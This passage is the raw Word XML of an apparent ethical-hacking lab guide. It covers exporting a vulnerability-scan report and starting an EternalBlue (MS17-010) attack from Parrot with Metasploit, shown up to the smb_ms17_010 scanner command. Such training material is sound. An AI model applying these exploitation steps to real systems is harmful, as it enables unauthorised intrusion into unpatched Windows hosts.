      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>172.19.19.15</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to view all the vulnerabilities associated with it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E533661" w14:textId="69A359BF"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21D1378C" wp14:editId="3F63904B">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1506725831" name="図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095A1A42" w14:textId="6B466D7B"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lastRenderedPageBreak/>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="724CAF67">
          <v:shape id="_x0000_i1270" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId81" w:name="DefaultOcxName38" w:shapeid="_x0000_i1270"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A list of vulnerabilities is displayed for this host as shown in the screenshot below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AE028F" w14:textId="00F1185E"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02F1EF71" wp14:editId="02A4A240">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="288051121" name="図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shot"/>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0EA504B7" w14:textId="503C87D4"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167B809E">
          <v:shape id="_x0000_i1269" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId83" w:name="DefaultOcxName39" w:shapeid="_x0000_i1269"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and select a format (here, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) in order to export the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB28F02" w14:textId="3C7D6AF8"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1B01FA94" wp14:editId="63CFF881">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1038288277" name="図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3C253836" w14:textId="65F4E7E9"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35F6CDB1">
          <v:shape id="_x0000_i1268" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId85" w:name="DefaultOcxName40" w:shapeid="_x0000_i1268"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Generate HTML Report</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> pop-up appears, choose </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> from the drop-down list and click on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Generate Report</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA4C73" w14:textId="186E0291"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="583DD58B" wp14:editId="01905087">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2048230715" name="図 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shot"/>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0983DA02" w14:textId="4AECA9CE"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lastRenderedPageBreak/>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="573611F5">
          <v:shape id="_x0000_i1267" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId87" w:name="DefaultOcxName41" w:shapeid="_x0000_i1267"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Save as window appears, choose your desired location to save the report and click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Save</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. In this lab we are choosing Desktop to save the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224F2684" w14:textId="3D8228C9"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="505BC363" wp14:editId="546839E7">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2075465506" name="図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51855ABD" w14:textId="56DD9D76"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6B638F91">
          <v:shape id="_x0000_i1266" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId89" w:name="DefaultOcxName42" w:shapeid="_x0000_i1266"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Now minimize the browser window and navigate to downloaded report location (here, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Desktop</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F6D4C3" w14:textId="3FFF82E9"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6587AF60">
          <v:shape id="_x0000_i1265" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId90" w:name="DefaultOcxName43" w:shapeid="_x0000_i1265"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Double-click on the downloaded file to view the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4CF6FC" w14:textId="313E121E"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215FDFE7" wp14:editId="660036AA">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="997231116" name="図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shot"/>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36ABF997" w14:textId="6329939C"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761D5537">
          <v:shape id="_x0000_i1264" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId92" w:name="DefaultOcxName44" w:shapeid="_x0000_i1264"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The generated report appears as shown in the screenshot. Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Show Details</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to view the complete details of the vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E92D9BD" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE0E0"/>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t>Scroll down to analyze the complete report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B8173A" w14:textId="43EB0FF0"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E5B16F0" wp14:editId="538C2EC5">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="651451833" name="図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4B5FF7BE" w14:textId="26064F35"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678BEE0B" wp14:editId="3515F289">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1546161752" name="図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shot"/>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3BB00E8A" w14:textId="2F82FC50" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1"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7E381BAC">
          <v:shape id="_x0000_i1263" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId95" w:name="DefaultOcxName45" w:shapeid="_x0000_i1263"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Now, we shall choose a vulnerability found in the target machine and attempt to exploit it using a Metasploit module. In this lab, we shall exploit a recently discovered vulnerability (Eternal Blue) associated with the MS:17-010 (CVE ID: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2017-0143</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>). Before performing the exploitation, ensure that victim machine </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Advertisement Dept</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> is powered </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Switch back to </w:t>
      </w:r>
      <w:hyperlink r:id="rId96" w:history="1">
        <w:r w:rsidRPr="00D86EB7">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0067B8"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Parrot</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2A87CA" w14:textId="675E1117"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498A831B" wp14:editId="2D9FD293">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1590096459" name="図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shot"/>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36A85169" w14:textId="2CB0299F"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61D472C1">
          <v:shape id="_x0000_i1262" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId98" w:name="DefaultOcxName46" w:shapeid="_x0000_i1262"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Launch a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Command Line Terminal</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> from the taskbar. Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> command and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to launch the Metasploit framework console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7247FAE3" w14:textId="5B8CECFB"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2E434F0D" wp14:editId="629725AB">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1705278843" name="図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sho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E70DD2F" w14:textId="20BEE9DA"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673C5FA4">
          <v:shape id="_x0000_i1261" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId100" w:name="DefaultOcxName47" w:shapeid="_x0000_i1261"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Now, we shall check if the Advertisement Dept machine is vulnerable to Eternal Blue using </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>smb_ms17_010</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> auxiliary scanner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE244B1" w14:textId="2C22FD16"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122E0015" wp14:editId="323B6874">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1205206487" name="図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572145E" w14:textId="64196EF4"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09C5CF84">
          <v:shape id="_x0000_i1260" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId102" w:name="DefaultOcxName48" w:shapeid="_x0000_i1260"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/smb_ms17_010</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to use the module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74841A5C" w14:textId="05541931"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04B6C30A" wp14:editId="68AE648B">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1059264639" name="図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AF42ED1" w14:textId="3CDBC25B"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72650011">
          <v:shape id="_x0000_i1259" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId104" w:name="DefaultOcxName49" w:shapeid="_x0000_i1259"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
